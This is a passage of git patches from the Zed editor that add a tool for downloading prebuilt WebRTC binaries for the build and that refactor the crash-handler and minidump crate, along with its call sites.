cargo_toml::Manifest; +use clap::Parser; +use regex::Regex; +use toml_edit::{DocumentMut, Item, Table, value}; + +use crate::workspace::load_workspace; + +const GITIGNORE_ENTRY: &str = ".webrtc-sys/"; +const LOCAL_DIR_NAME: &str = ".webrtc-sys"; +const ENV_VAR: &str = "LK_CUSTOM_WEBRTC"; + +#[derive(Parser)] +pub struct SetupWebrtcArgs { + /// Re-download even if the target directory already exists. + #[arg(long)] + force: bool, + + /// Override the host triple component used for the release artifact + /// (e.g. `mac-arm64-release`). Defaults to the current host. + #[arg(long)] + triple: Option, + + /// Skip writing to `~/.cargo/config.toml`. Useful when you only want the + /// archive on disk and intend to set `LK_CUSTOM_WEBRTC` yourself. + #[arg(long)] + no_cargo_config: bool, +} + +pub fn run_setup_webrtc(args: SetupWebrtcArgs) -> Result<()> { + let metadata = load_workspace()?; + let workspace_root = metadata.workspace_root.as_std_path().to_path_buf(); + + let rev = read_webrtc_sys_rev(&workspace_root)?; + eprintln!("Pinned livekit-rust-sdks rev: {rev}"); + + let tag = fetch_webrtc_tag(&rev)?; + eprintln!("WEBRTC_TAG for that rev: {tag}"); + + let triple = match args.triple { + Some(triple) => triple, + None => host_webrtc_triple()?, + }; + eprintln!("Target triple: {triple}"); + + let local_root = workspace_root.join(LOCAL_DIR_NAME); + let tag_dir = local_root.join(&tag); + let extracted_dir = tag_dir.join(&triple); + + if extracted_dir.exists() && !args.force { + eprintln!( + "Already present at {}, skipping download.", + extracted_dir.display() + ); + } else { + if extracted_dir.exists() { + fs::remove_dir_all(&extracted_dir) + .with_context(|| format!("removing stale {}", extracted_dir.display()))?; + } + fs::create_dir_all(&tag_dir).with_context(|| format!("creating {}", tag_dir.display()))?; + download_and_extract(&tag, &triple, &tag_dir)?; + } + + let absolute = extracted_dir + .canonicalize() + .with_context(|| format!("canonicalizing {}", extracted_dir.display()))?; + + ensure_gitignore_entry(&workspace_root)?; + + if args.no_cargo_config { + eprintln!( + "Skipping ~/.cargo/config.toml update. Set {ENV_VAR}={} yourself.", + absolute.display() + ); + } else { + update_cargo_config(&absolute)?; + } + + eprintln!(); + eprintln!("Done. {ENV_VAR} -> {}", absolute.display()); + Ok(()) +} + +fn read_webrtc_sys_rev(workspace_root: &Path) -> Result { + let manifest_path = workspace_root.join("Cargo.toml"); + let manifest = Manifest::from_path(&manifest_path) + .with_context(|| format!("parsing {}", manifest_path.display()))?; + + let patch = manifest + .patch + .get("crates-io") + .context("workspace Cargo.toml has no [patch.crates-io] section")?; + let dep = patch + .get("webrtc-sys") + .context("[patch.crates-io] is missing webrtc-sys")?; + let detail = dep + .detail() + .context("webrtc-sys patch entry is not a table")?; + detail + .git + .as_ref() + .context("webrtc-sys patch is missing a git source")?; + detail + .rev + .clone() + .context("webrtc-sys patch is missing a `rev`") +} + +fn fetch_webrtc_tag(rev: &str) -> Result { + let url = format!( + "https://raw.githubusercontent.com/zed-industries/livekit-rust-sdks/{rev}/webrtc-sys/build/src/lib.rs" + ); + let body = curl_text(&url).with_context(|| format!("fetching {url}"))?; + + let re = + Regex::new(r#"pub\s+const\s+WEBRTC_TAG\s*:\s*&str\s*=\s*"([^"]+)""#).expect("static regex"); + let captures = re + .captures(&body) + .with_context(|| format!("could not find WEBRTC_TAG in {url}"))?; + Ok(captures[1].to_string()) +} + +fn host_webrtc_triple() -> Result { + let os = match std::env::consts::OS { + "macos" => "mac", + "linux" => "linux", + "windows" => "win", + other => bail!("unsupported host OS: {other}"), + }; + let arch = match std::env::consts::ARCH { + "aarch64" => "arm64", + "x86_64" => "x64", + other => bail!("unsupported host arch: {other}"), + }; + Ok(format!("{os}-{arch}-release")) +} + +fn download_and_extract(tag: &str, triple: &str, into: &Path) -> Result<()> { + let url = format!( + "https://github.com/zed-industries/livekit-rust-sdks/releases/download/{tag}/webrtc-{triple}.zip" + ); + let zip_path = into.join(format!("webrtc-{triple}.zip")); + + eprintln!("Downloading {url}"); + let status = Command::new("curl") + .args(["-fL", "--retry", "3", "--progress-bar", "-o"]) + .arg(&zip_path) + .arg(&url) + .status() + .context("running curl")?; + if !status.success() { + bail!("curl exited with {status} while downloading {url}"); + } + + eprintln!("Extracting into {}", into.display()); + let status = Command::new("unzip") + .arg("-q") + .arg("-o") + .arg(&zip_path) + .arg("-d") + .arg(into) + .status() + .context("running unzip")?; + if !status.success() { + bail!( + "unzip exited with {status} while extracting {}", + zip_path.display() + ); + } + + fs::remove_file(&zip_path).ok(); + Ok(()) +} + +fn curl_text(url: &str) -> Result { + let output = Command::new("curl") + .args(["-fsSL", url]) + .output() + .context("running curl")?; + if !output.status.success() { + bail!( + "curl failed for {url} (exit {}): {}", + output.status, + String::from_utf8_lossy(&output.stderr).trim(), + ); + } + String::from_utf8(output.stdout).context("curl returned non-UTF-8 body") +} + +fn ensure_gitignore_entry(workspace_root: &Path) -> Result<()> { + let path = workspace_root.join(".gitignore"); + let existing = + fs::read_to_string(&path).with_context(|| format!("reading {}", path.display()))?; + if existing + .lines() + .any(|line| line.trim() == GITIGNORE_ENTRY || line.trim() == LOCAL_DIR_NAME) + { + return Ok(()); + } + let mut updated = existing; + if !updated.ends_with('\n') { + updated.push('\n'); + } + updated.push_str(GITIGNORE_ENTRY); + updated.push('\n'); + fs::write(&path, updated).with_context(|| format!("writing {}", path.display()))?; + eprintln!("Added {GITIGNORE_ENTRY} to .gitignore"); + Ok(()) +} + +fn update_cargo_config(webrtc_path: &Path) -> Result<()> { + let home = std::env::var_os("HOME") + .or_else(|| std::env::var_os("USERPROFILE")) + .context("could not determine home directory")?; + let config_path = PathBuf::from(home).join(".cargo").join("config.toml"); + if config_path.exists() { + bail!( + "{} already exists; refusing to modify it. \ + Add `[env]\\n{ENV_VAR} = \"{}\"` yourself, \ + or re-run with --no-cargo-config.", + config_path.display(), + webrtc_path.display(), + ); + } + + if let Some(parent) = config_path.parent() { + fs::create_dir_all(parent).with_context(|| format!("creating {}", parent.display()))?; + } + + let mut doc = DocumentMut::new(); + let mut env_table = Table::new(); + env_table.set_implicit(false); + let path_str = webrtc_path + .to_str() + .context("webrtc path is not valid UTF-8")?; + env_table.insert(ENV_VAR, value(path_str)); + doc.insert("env", Item::Table(env_table)); + + fs::write(&config_path, doc.to_string()) + .with_context(|| format!("writing {}", config_path.display()))?; + eprintln!("Wrote {} with {ENV_VAR}={path_str}", config_path.display()); + Ok(()) +} From a28972fd2ebdda1346bd16609e5a6c38494f61f7 Mon Sep 17 00:00:00 2001 From: Lukas Wirth Date: Mon, 4 May 2026 08:30:47 +0200 Subject: [PATCH 144/231] Cleanup crashes crate (#54927) Self-Review Checklist: - [ ] I've reviewed my own diff for quality, security, and reliability - [ ] Unsafe blocks (if any) have justifying comments - [ ] The content is consistent with the [UI/UX checklist](https://github.com/zed-industries/zed/blob/main/CONTRIBUTING.md#uiux-checklist) - [ ] Tests cover the new/changed behavior - [ ] Performance impact has been considered and is acceptable Closes #ISSUE Release Notes: - N/A or Added/Fixed/Improved ... --- Cargo.lock | 10 +- Cargo.toml | 3 +- crates/crashes/Cargo.toml | 4 - crates/crashes/src/crashes.rs | 399 +++++++++++++----------- crates/feedback/Cargo.toml | 2 +- crates/feedback/src/feedback.rs | 10 +- crates/remote_server/src/main.rs | 2 +- crates/remote_server/src/server.rs | 93 ++++-- crates/system_specs/Cargo.toml | 1 - crates/system_specs/src/system_specs.rs | 14 +- crates/zed/src/main.rs | 106 +++++-- crates/zed/src/zed.rs | 8 +- 12 files changed, 375 insertions(+), 277 deletions(-) diff --git a/Cargo.lock b/Cargo.lock index 9bda3f999ce560..5242481f927a68 100644 --- a/Cargo.lock +++ b/Cargo.lock @@ -4097,9 +4097,9 @@ dependencies = [ [[package]] name = "crash-handler" -version = "0.6.3" +version = "0.7.0" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "2066907075af649bcb8bcb1b9b986329b243677e6918b2d920aa64b0aac5ace3" +checksum = "0df5c9639f4942eb7702b964b3f9adf03a55724a57558cc177407388a8b936e2" dependencies = [ "cfg-if", "crash-context", @@ -4113,15 +4113,11 @@ name = "crashes" version = "0.1.0" dependencies = [ "async-process", - "cfg-if", "crash-handler", - "futures 0.3.32", "log", "mach2 0.5.0", "minidumper", "parking_lot", - "paths", - "release_channel", "serde", "serde_json", "system_specs", @@ -6260,6 +6256,7 @@ dependencies = [ name = "feedback" version = "0.1.0" dependencies = [ + "client", "extension_host", "gpui", "system_specs", @@ -17561,7 +17558,6 @@ name = "system_specs" version = "0.1.0" dependencies = [ "anyhow", - "client", "gpui", "human_bytes", "pciid-parser", diff --git a/Cargo.toml b/Cargo.toml index b526095e47c5eb..e613ed2e99afad 100644 --- a/Cargo.toml +++ b/Cargo.toml @@ -554,7 +554,7 @@ core-foundation = "=0.10.0" core-foundation-sys = "0.8.6" core-video = { version = "0.5.2", features = ["metal"] } cpal = "0.17" -crash-handler = "0.6" +crash-handler = "0.7" criterion = { version = "0.5", features = ["html_reports"] } ctor = "0.4.0" dap-types = { git = "https://github.com/zed-industries/dap-types", rev = "1b461b310481d01e02b2603c16d7144b926339f8" } @@ -914,6 +914,7 @@ wasmtime = { opt-level = 3 } cranelift-codegen = { opt-level = 3 } wasmtime-environ = { opt-level = 3 } wasmtime-internal-cranelift = { opt-level = 3 } +minidumper = { opt-level = 3 } # Build single-source-file crates with cg=1 as it helps make `cargo build` of a whole workspace a bit faster activity_indicator = { codegen-units = 1 } assets = { codegen-units = 1 } diff --git a/crates/crashes/Cargo.toml b/crates/crashes/Cargo.toml index 6886e5808aa542..f8b898112c1881 100644 --- a/crates/crashes/Cargo.toml +++ b/crates/crashes/Cargo.toml @@ -7,14 +7,10 @@ license = "GPL-3.0-or-later" [dependencies] async-process.workspace = true -cfg-if.workspace = true crash-handler.workspace = true -futures.workspace = true log.workspace = true minidumper.workspace = true parking_lot.workspace = true -paths.workspace = true -release_channel.workspace = true serde.workspace = true serde_json.workspace = true system_specs.workspace = true diff --git a/crates/crashes/src/crashes.rs b/crates/crashes/src/crashes.rs index 9abe7eb8b402f3..12c251e6f7ff5d 100644 --- a/crates/crashes/src/crashes.rs +++ b/crates/crashes/src/crashes.rs @@ -1,55 +1,42 @@ use crash_handler::{CrashEventResult, CrashHandler}; -use futures::future::BoxFuture; use log::info; -use minidumper::{Client, LoopAction, MinidumpBinary, Server, SocketName}; +use minidumper::{LoopAction, MinidumpBinary, Server, SocketName}; use parking_lot::Mutex; -use release_channel::{RELEASE_CHANNEL, ReleaseChannel}; use serde::{Deserialize, Serialize}; -use std::mem; +use std::{panic::Location, pin::Pin}; -#[cfg(not(target_os = "windows"))] -use async_process::Command; use system_specs::GpuSpecs; -#[cfg(target_os = "macos")] -use std::sync::atomic::AtomicU32; use std::{ env, fs::{self, File}, - io, - panic::{self, PanicHookInfo}, + io, panic, path::{Path, PathBuf}, process::{self}, sync::{ - Arc, OnceLock, + Arc, atomic::{AtomicBool, Ordering}, }, thread, time::Duration, }; -// set once the crash handler has initialized and the client has connected to it -static CRASH_HANDLER: OnceLock> = OnceLock::new(); -// set when the first minidump request is made to avoid generating duplicate crash reports -pub static REQUESTED_MINIDUMP: AtomicBool = AtomicBool::new(false); +pub use minidumper::Client; + const CRASH_HANDLER_PING_TIMEOUT: Duration = Duration::from_secs(60); const CRASH_HANDLER_CONNECT_TIMEOUT: Duration = Duration::from_secs(10); -static PENDING_CRASH_SERVER_MESSAGES: Mutex> = Mutex::new(Vec::new()); - -#[cfg(target_os = "macos")] -static PANIC_THREAD_ID: AtomicU32 = AtomicU32::new(0); - -fn should_install_crash_handler() -> bool { - if let Ok(value) = env::var("ZED_GENERATE_MINIDUMPS") { - return value == "true" || value == "1"; - } - - if *RELEASE_CHANNEL == ReleaseChannel::Dev { - return false; - } - - true +/// Force a backtrace to be printed on panic. +pub fn force_backtrace() { + let old_hook = panic::take_hook(); + panic::set_hook(Box::new(move |info| { + unsafe { env::set_var("RUST_BACKTRACE", "1") }; + old_hook(info); + // prevent the macOS crash dialog from popping up + if cfg!(target_os = "macos") { + std::process::exit(1); + } + })); } /// Install crash signal handlers and spawn the crash-handler subprocess. @@ -57,133 +44,125 @@ fn should_install_crash_handler() -> bool { /// The synchronous portion (signal handlers, panic hook) runs inline. /// The async keepalive task is passed to `spawn` so the caller decides /// which executor to schedule it on. -pub fn init + Send + Sync + 'static>( +pub fn init( crash_init: InitCrashHandler, - spawn: impl FnOnce(BoxFuture<'static, ()>), - wait_timer: impl (Fn(Duration) -> F) + Send + Sync + 'static, -) { - if !should_install_crash_handler() { - let old_hook = panic::take_hook(); - panic::set_hook(Box::new(move |info| { - unsafe { env::set_var("RUST_BACKTRACE", "1") }; - old_hook(info); - // prevent the macOS crash dialog from popping up - if cfg!(target_os = "macos") { - std::process::exit(1); - } - })); - return; - } - - panic::set_hook(Box::new(panic_hook)); - - let handler = CrashHandler::attach(unsafe { - crash_handler::make_crash_event(move |crash_context: &crash_handler::CrashContext| { - let Some(client) = CRASH_HANDLER.get() else { - return CrashEventResult::Handled(false); - }; - - // only request a minidump once - let res = if REQUESTED_MINIDUMP - .compare_exchange(false, true, Ordering::Acquire, Ordering::Relaxed) - .is_ok() - { - #[cfg(target_os = "macos")] - suspend_all_other_threads(); - - // on macos this "ping" is needed to ensure that all our - // `client.send_message` calls have been processed before we trigger the - // minidump request. - client.ping().ok(); - client.request_dump(crash_context).is_ok() - } else { - true - }; - CrashEventResult::Handled(res) - }) - }) - .expect("failed to attach signal handler"); - - info!("crash signal handlers installed"); - - spawn(Box::pin(connect_and_keepalive( - crash_init, handler, wait_timer, - ))); + spawn: S, + socket_path: P, + wait_timer: C, +) -> impl Future> + use +where + F: Future + Send + Sync + 'static, + C: (Fn(Duration) -> F) + Send + Sync + 'static, + S: FnOnce(Pin + Send + 'static>>), + P: FnOnce(u32) -> PathBuf, +{ + connect_and_keepalive(crash_init, socket_path, wait_timer, spawn) } /// Spawn the crash-handler subprocess, connect the IPC client, and run the /// keepalive ping loop. Called on a background executor by [`init`]. -async fn connect_and_keepalive + Send + Sync + 'static>( +fn connect_and_keepalive( crash_init: InitCrashHandler, - handler: CrashHandler, - wait_timer: impl (Fn(Duration) -> F) + Send + Sync + 'static, -) { + socket_path: P, + wait_timer: C, + spawn: S, +) -> impl Future> + use +where + F: Future + Send + Sync + 'static, + C: (Fn(Duration) -> F) + Send + Sync + 'static, + S: FnOnce(Pin + Send + 'static>>), + P: FnOnce(u32) -> PathBuf, +{ let exe = env::current_exe().expect("unable to find ourselves"); - let zed_pid = process::id(); - let socket_name = paths::temp_dir().join(format!("zed-crash-handler-{zed_pid}")); - #[cfg(not(target_os = "windows"))] - let _crash_handler = Command::new(exe) - .arg("--crash-handler") - .arg(&socket_name) - .spawn() - .expect("unable to spawn server process"); - - #[cfg(target_os = "windows")] - spawn_crash_handler_windows(&exe, &socket_name); - + let socket_path = socket_path(process::id()); + let mut _crash_handler = spawn_crash_handler(&exe, &socket_path); info!("spawning crash handler process"); - send_crash_server_message(CrashServerMessage::Init(crash_init)); - - let mut elapsed = Duration::ZERO; - let retry_frequency = Duration::from_millis(100); - let mut maybe_client = None; - while maybe_client.is_none() { - if let Ok(client) = Client::with_name(SocketName::Path(&socket_name)) { - maybe_client = Some(client); - info!("connected to crash handler process after {elapsed:?}"); - break; - } - elapsed += retry_frequency; - wait_timer(retry_frequency).await; - } - let client = maybe_client.unwrap(); - let client = Arc::new(client); - - #[cfg(target_os = "linux")] - handler.set_ptracer(Some(_crash_handler.id())); - - // Publishing the client to the OnceLock makes it visible to the signal - // handler callback installed earlier. - CRASH_HANDLER.set(client.clone()).ok(); - let messages: Vec<_> = mem::take(PENDING_CRASH_SERVER_MESSAGES.lock().as_mut()); - for message in messages.into_iter() { - send_crash_server_message(message); - } - // mem::forget so that the drop is not called - mem::forget(handler); - info!("crash handler registered"); - - loop { - client.ping().ok(); - wait_timer(Duration::from_secs(10)).await; - } -} - -#[cfg(target_os = "macos")] -unsafe fn suspend_all_other_threads() { - let task = unsafe { mach2::traps::current_task() }; - let mut threads: mach2::mach_types::thread_act_array_t = std::ptr::null_mut(); - let mut count = 0; - unsafe { - mach2::task::task_threads(task, &raw mut threads, &raw mut count); - } - let current = unsafe { mach2::mach_init::mach_thread_self() }; - let panic_thread = PANIC_THREAD_ID.load(Ordering::SeqCst); - for i in 0..count { - let t = unsafe { *threads.add(i as usize) }; - if t != current && t != panic_thread { - unsafe { mach2::thread_act::thread_suspend(t) }; - } + async move { + let mut elapsed = Duration::ZERO; + let retry_frequency = Duration::from_millis(100); + let client = loop { + if let Ok(client) = Client::with_name(SocketName::Path(&socket_path)) { + info!("connected to crash handler process after {elapsed:?}"); + break client; + } + elapsed += retry_frequency; + wait_timer(retry_frequency).await; + }; + let client = Arc::new(client); + + panic::set_hook({ + let client = client.clone(); + Box::new(move |payload| { + panic_hook( + client.clone(), + payload.payload_as_str().unwrap_or("Box"), + payload.location(), + ) + }) + }); + info!("panic handler registered"); + let handler = CrashHandler::attach(unsafe { + let client = client.clone(); + let handler = move |crash_context: &crash_handler::CrashContext| { + // set when the first minidump request is made to avoid generating duplicate crash reports + static REQUESTED_MINIDUMP: AtomicBool = AtomicBool::new(false); + + // only request a minidump once + let res = if REQUESTED_MINIDUMP + .compare_exchange(false, true, Ordering::Acquire, Ordering::Relaxed) + .is_ok() + { + #[cfg(target_os = "macos")] + macos::suspend_all_other_threads(); + + // on macos this "ping" is needed to ensure that all our + // `client.send_message` calls have been processed before we trigger the + // minidump request. + client.ping().ok(); + let r = client.request_dump(crash_context); + if let Err(e) = &r { + eprintln!("failed to request dump: {:?}", e); + } + #[cfg(target_os = "macos")] + macos::resume_all_other_threads(); + r.is_ok() + } else { + true + }; + CrashEventResult::Handled(res) + }; + crash_handler::make_crash_event(handler) + }) + .expect("failed to attach signal handler"); + + info!("crash signal handlers installed"); + send_crash_server_message(&client, CrashServerMessage::Init(crash_init)); + + #[cfg(target_os = "linux")] + handler.set_ptracer(Some(_crash_handler.id())); + + info!("crash handler registered"); + spawn(Box::pin({ + let client = client.clone(); + async move { + let _handler = { handler }; + loop { + if let Err(e) = client.ping() { + #[cfg(not(target_os = "windows"))] + log::error!( + "ping failed: {:?}, process exit status: {:?}", + e, + _crash_handler.try_status() + ); + #[cfg(target_os = "windows")] + log::error!("ping failed: {:?}", e,); + break; + }; + wait_timer(Duration::from_secs(10)).await; + } + } + })); + client } } @@ -193,6 +172,7 @@ pub struct CrashServer { active_gpu: Mutex>, user_info: Mutex>, has_connection: Arc, + logs_dir: PathBuf, } #[derive(Debug, Deserialize, Serialize, Clone)] @@ -226,11 +206,7 @@ pub struct UserInfo { pub is_staff: Option, } -fn send_crash_server_message(message: CrashServerMessage) { - let Some(crash_server) = CRASH_HANDLER.get() else { - PENDING_CRASH_SERVER_MESSAGES.lock().push(message); - return; - }; +fn send_crash_server_message(crash_client: &Arc, message: CrashServerMessage) { let data = match serde_json::to_vec(&message) { Ok(data) => data, Err(err) => { @@ -239,17 +215,17 @@ fn send_crash_server_message(message: CrashServerMessage) { } }; - if let Err(err) = crash_server.send_message(0, data) { + if let Err(err) = crash_client.send_message(0, data) { log::warn!("Failed to send data to crash server {:?}", err); } } -pub fn set_gpu_info(specs: GpuSpecs) { - send_crash_server_message(CrashServerMessage::GPUInfo(specs)); +pub fn set_gpu_info(crash_client: &Arc, specs: GpuSpecs) { + send_crash_server_message(crash_client, CrashServerMessage::GPUInfo(specs)); } -pub fn set_user_info(info: UserInfo) { - send_crash_server_message(CrashServerMessage::UserInfo(info)); +pub fn set_user_info(crash_client: &Arc, info: UserInfo) { + send_crash_server_message(crash_client, CrashServerMessage::UserInfo(info)); } #[derive(Serialize, Deserialize, Debug)] @@ -262,7 +238,8 @@ enum CrashServerMessage { impl minidumper::ServerHandler for CrashServer { fn create_minidump_file(&self) -> Result<(File, PathBuf), io::Error> { - let dump_path = paths::logs_dir() + let dump_path = self + .logs_dir .join( &self .initialization_params @@ -318,7 +295,8 @@ impl minidumper::ServerHandler for CrashServer { user_info: self.user_info.lock().clone(), }; - let crash_data_path = paths::logs_dir() + let crash_data_path = self + .logs_dir .join(&crash_info.init.session_id) .with_extension("json"); @@ -382,52 +360,92 @@ fn strip_user_string_from_panic(message: &str) -> String { message.to_owned() } -pub fn panic_hook(info: &PanicHookInfo) { - let message = strip_user_string_from_panic(info.payload_as_str().unwrap_or("Box")); +pub fn panic_hook(crash_client: Arc, message: &str, location: Option<&Location>) { + let message = strip_user_string_from_panic(message); - let span = info - .location() + let span = location .map(|loc| format!("{}:{}", loc.file(), loc.line())) .unwrap_or_default(); let current_thread = std::thread::current(); let thread_name = current_thread.name().unwrap_or(""); - // wait 500ms for the crash handler process to start up - // if it's still not there just write panic info and no minidump - let retry_frequency = Duration::from_millis(100); - for _ in 0..5 { - if CRASH_HANDLER.get().is_some() { - break; - } - thread::sleep(retry_frequency); - } - let location = info - .location() - .map_or_else(|| "".to_owned(), |location| location.to_string()); + let location = location.map_or_else(|| "".to_owned(), |location| location.to_string()); log::error!("thread '{thread_name}' panicked at {location}:\n{message}..."); - send_crash_server_message(CrashServerMessage::Panic(CrashPanic { message, span })); + send_crash_server_message( + &crash_client, + CrashServerMessage::Panic(CrashPanic { message, span }), + ); log::error!("triggering a crash to generate a minidump..."); #[cfg(target_os = "macos")] - PANIC_THREAD_ID.store( - unsafe { mach2::mach_init::mach_thread_self() }, - Ordering::SeqCst, - ); + macos::set_panic_thread_id(); + #[cfg(target_os = "windows")] + { + // https://learn.microsoft.com/en-us/windows/win32/debug/system-error-codes--0-499- + CrashHandler.simulate_exception(Some(234)); // (MORE_DATA_AVAILABLE) + } + #[cfg(not(target_os = "windows"))] + { + std::process::abort(); + } +} + +#[cfg(target_os = "macos")] +mod macos { + static PANIC_THREAD_ID: std::sync::atomic::AtomicU32 = std::sync::atomic::AtomicU32::new(0); + + pub(super) fn set_panic_thread_id() { + PANIC_THREAD_ID.store( + unsafe { mach2::mach_init::mach_thread_self() }, + std::sync::atomic::Ordering::Release, + ); + } - cfg_if::cfg_if! { - if #[cfg(target_os = "windows")] { - // https://learn.microsoft.com/en-us/windows/win32/debug/system-error-codes--0-499- - CrashHandler.simulate_exception(Some(234)); // (MORE_DATA_AVAILABLE) - } else { - std::process::abort(); + pub(super) unsafe fn suspend_all_other_threads() { + let task = unsafe { mach2::traps::current_task() }; + let mut threads: mach2::mach_types::thread_act_array_t = std::ptr::null_mut(); + let mut count = 0; + unsafe { + mach2::task::task_threads(task, &raw mut threads, &raw mut count); + } + let current = unsafe { mach2::mach_init::mach_thread_self() }; + for i in 0..count { + let t = unsafe { *threads.add(i as usize) }; + if t != current { + unsafe { mach2::thread_act::thread_suspend(t) }; + } } } + + pub(super) unsafe fn resume_all_other_threads() { + let task = unsafe { mach2::traps::current_task() }; + let mut threads: mach2::mach_types::thread_act_array_t = std::ptr::null_mut(); + let mut count = 0; + unsafe { + mach2::task::task_threads(task, &raw mut threads, &raw mut count); + } + let current = unsafe { mach2::mach_init::mach_thread_self() }; + for i in 0..count { + let t = unsafe { *threads.add(i as usize) }; + if t != current { + unsafe { mach2::thread_act::thread_resume(t) }; + } + } + } +} +#[cfg(not(target_os = "windows"))] +fn spawn_crash_handler(exe: &Path, socket_name: &Path) -> async_process::Child { + async_process::Command::new(exe) + .arg("--crash-handler") + .arg(&socket_name) + .spawn() + .expect("unable to spawn server process") } #[cfg(target_os = "windows")] -fn spawn_crash_handler_windows(exe: &Path, socket_name: &Path) { +fn spawn_crash_handler(exe: &Path, socket_name: &Path) { use std::ffi::OsStr; use std::iter::once; use std::os::windows::ffi::OsStrExt; @@ -477,7 +495,7 @@ fn spawn_crash_handler_windows(exe: &Path, socket_name: &Path) { } } -pub fn crash_server(socket: &Path) { +pub fn crash_server(socket: &Path, logs_dir: PathBuf) { let Ok(mut server) = Server::with_name(SocketName::Path(socket)) else { log::info!("Couldn't create socket, there may already be a running crash server"); return; @@ -508,6 +526,7 @@ pub fn crash_server(socket: &Path) { user_info: Mutex::default(), has_connection, active_gpu: Mutex::default(), + logs_dir, }), &shutdown, Some(CRASH_HANDLER_PING_TIMEOUT), diff --git a/crates/feedback/Cargo.toml b/crates/feedback/Cargo.toml index 6a595bf4ee4645..981fc4ea41c4bb 100644 --- a/crates/feedback/Cargo.toml +++ b/crates/feedback/Cargo.toml @@ -22,4 +22,4 @@ urlencoding.workspace = true util.workspace = true workspace.workspace = true zed_actions.workspace = true - +client.workspace = true diff --git a/crates/feedback/src/feedback.rs b/crates/feedback/src/feedback.rs index 4a9f92d6d26b68..16c91ce769dff9 100644 --- a/crates/feedback/src/feedback.rs +++ b/crates/feedback/src/feedback.rs @@ -1,3 +1,4 @@ +use client::telemetry; use extension_host::ExtensionStore; use gpui::{App, ClipboardItem, PromptLevel, actions}; use system_specs::{CopySystemSpecsIntoClipboard, SystemSpecs}; @@ -48,7 +49,8 @@ pub fn init(cx: &mut App) { cx.observe_new(|workspace: &mut Workspace, _, _| { workspace .register_action(|_, _: &CopySystemSpecsIntoClipboard, window, cx| { - let specs = SystemSpecs::new(window, cx); + let specs = + SystemSpecs::new(window, cx, telemetry::os_name(), telemetry::os_version()); cx.spawn_in(window, async move |_, cx| { let specs = specs.await.to_string(); @@ -83,7 +85,8 @@ pub fn init(cx: &mut App) { cx.open_url(REQUEST_FEATURE_URL); }) .register_action(move |_, _: &FileBugReport, window, cx| { - let specs = SystemSpecs::new(window, cx); + let specs = + SystemSpecs::new(window, cx, telemetry::os_name(), telemetry::os_version()); cx.spawn_in(window, async move |_, cx| { let specs = specs.await; cx.update(|_, cx| { @@ -94,7 +97,8 @@ pub fn init(cx: &mut App) { .detach(); }) .register_action(move |_, _: &EmailZed, window, cx| { - let specs = SystemSpecs::new(window, cx); + let specs = + SystemSpecs::new(window, cx, telemetry::os_name(), telemetry::os_version()); cx.spawn_in(window, async move |_, cx| { let specs = specs.await; cx.update(|_, cx| { diff --git a/crates/remote_server/src/main.rs b/crates/remote_server/src/main.rs index 66ffcc1631786a..5f0033f1a0aa65 100644 --- a/crates/remote_server/src/main.rs +++ b/crates/remote_server/src/main.rs @@ -30,7 +30,7 @@ fn main() -> anyhow::Result<()> { } if let Some(socket) = &cli.crash_handler { - crashes::crash_server(socket.as_path()); + crashes::crash_server(socket.as_path(), paths::logs_dir().clone()); return Ok(()); } diff --git a/crates/remote_server/src/server.rs b/crates/remote_server/src/server.rs index c0a6d6de1993b4..ec2b1963b9df96 100644 --- a/crates/remote_server/src/server.rs +++ b/crates/remote_server/src/server.rs @@ -462,21 +462,35 @@ pub fn execute_run( let app = gpui_platform::headless(); let pid = std::process::id(); let id = pid.to_string(); - crashes::init( - crashes::InitCrashHandler { - session_id: id, - zed_version: VERSION.to_owned(), - binary: "zed-remote-server".to_string(), - release_channel: release_channel::RELEASE_CHANNEL_NAME.clone(), - commit_sha: option_env!("ZED_COMMIT_SHA").unwrap_or("no_sha").to_owned(), - }, - |task| { - app.background_executor().spawn(task).detach(); - }, - // we are running outside gpui - #[allow(clippy::disallowed_methods)] - |duration| FutureExt::map(Timer::after(duration), |_| ()), - ); + let should_install_crash_handler = matches!( + env::var("ZED_GENERATE_MINIDUMPS").as_deref(), + Ok("true" | "1") + ) || *RELEASE_CHANNEL != ReleaseChannel::Dev; + + let crash_handler = if should_install_crash_handler { + Some(app.background_executor().spawn(crashes::init( + crashes::InitCrashHandler { + session_id: id, + zed_version: VERSION.to_owned(), + binary: "zed-remote-server".to_string(), + release_channel: release_channel::RELEASE_CHANNEL_NAME.clone(), + commit_sha: option_env!("ZED_COMMIT_SHA").unwrap_or("no_sha").to_owned(), + }, + { + let background_executor = app.background_executor(); + move |task| { + background_executor.spawn(task).detach(); + } + }, + |pid| paths::temp_dir().join(format!("zed-remote-server-crash-handler-{pid}")), + // we are running outside gpui + #[allow(clippy::disallowed_methods)] + |duration| FutureExt::map(Timer::after(duration), |_| ()), + ))) + } else { + crashes::force_backtrace(); + None + }; let log_rx = init_logging_server(&log_file)?; log::info!( "starting up with PID {}:\npid_file: {:?}, log_file: {:?}, stdin_socket: {:?}, stdout_socket: {:?}, stderr_socket: {:?}", @@ -515,7 +529,14 @@ pub fn execute_run( let shell_env_loaded_rx: Option> = None; let git_hosting_provider_registry = Arc::new(GitHostingProviderRegistry::new()); - let run = move |cx: &mut _| { + let run = move |cx: &mut App| { + if let Some(crash_handler) = crash_handler { + cx.spawn(async move |_cx| { + let _crash_handler = crash_handler.await; + // cx.update(|cx| cx.set_global(CrashHandler(crash_handler))) + }) + .detach(); + } settings::init(cx); let app_commit_sha = option_env!("ZED_COMMIT_SHA").map(|s| AppCommitSha::new(s.to_owned())); let app_version = AppVersion::load( @@ -720,22 +741,30 @@ pub(crate) fn execute_proxy( let server_paths = ServerPaths::new(&identifier)?; let id = std::process::id().to_string(); - crashes::init( - crashes::InitCrashHandler { - session_id: id, - zed_version: VERSION.to_owned(), - binary: "zed-remote-server".to_string(), - release_channel: release_channel::RELEASE_CHANNEL_NAME.clone(), - commit_sha: option_env!("ZED_COMMIT_SHA").unwrap_or("no_sha").to_owned(), - }, - |task| { - smol::spawn(task).detach(); - }, - // we are running outside gpui - #[allow(clippy::disallowed_methods)] - |duration| FutureExt::map(Timer::after(duration), |_| ()), - ); - + let should_install_crash_handler = matches!( + env::var("ZED_GENERATE_MINIDUMPS").as_deref(), + Ok("true" | "1") + ) || *RELEASE_CHANNEL != ReleaseChannel::Dev; + + if should_install_crash_handler { + smol::spawn(crashes::init( + crashes::InitCrashHandler { + session_id: id, + zed_version: VERSION.to_owned(), + binary: "zed-remote-proxy".to_string(), + release_channel: release_channel::RELEASE_CHANNEL_NAME.clone(), + commit_sha: 